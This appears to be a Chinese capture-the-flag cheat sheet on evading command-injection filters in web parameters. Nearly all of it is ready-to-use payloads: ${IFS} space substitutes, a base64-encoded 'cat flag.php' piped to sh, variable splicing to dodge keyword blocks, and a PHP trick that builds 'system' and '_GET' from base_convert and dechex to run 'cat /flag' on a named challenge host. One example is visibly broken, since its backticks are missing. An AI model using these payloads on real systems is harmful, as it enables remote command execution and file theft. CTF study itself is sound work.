常见绕过方法

空格替代:
${IFS}
$IFS$9
<
<>
{,}

---

sh

/?ip=127.0.0.1;echo$IFS$2Y2F0IGZsYWcucGhw|base64$IFS$2-d|sh

变量拼接：
/?ip=127.0.0.1;a=g;cat$IFS$2fla$a.php

内联注释(将反引号命令的结果作为输入来执行命令)
/?ip=127.0.0.1;cat$IFS$2ls

查看命令补充
cat 由第一行开始显示内容，并将所有内容输出
tac 从最后一行倒序显示内容，并将所有内容输出
more 根据窗口大小，一页一页的现实文件内容
less 和more类似，但是是从后往前翻页并且，进行可以搜索字符
head 只显示头几行
tail 只显示最后几行
nl 类似于cat -n，显示时输出行号

---

进制绕过
php中可以把函数名通过字符串的方式传递给一个变量，然后通过此变量动态调用函数比如下面的代码会执行 system(‘ls’);

$a=’system’;
$a(‘ls’);

常用函数：base_convert(“1001”2,10)是将二进制的1001转换为10进制
dechex 10进制转成16进制
hex2bin 16进制转成字符串的函数
_GET

http://4f07a754-92bf-4411-8bd8-a8da7ec1c514.node4.buuoj.cn:81/?c=$p=base_convert(37907361743,10,36)dechex(1598506324);$$p={'system'};$$p(cat /flag)
c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{pi}($$pi{abs})&pi=system&abs=cat /flag
$_GET{pi}($_GET{abs}) pi=system abs=cat /flag
本来是$_GET[] –>如果[]被过滤可以用$_GET{}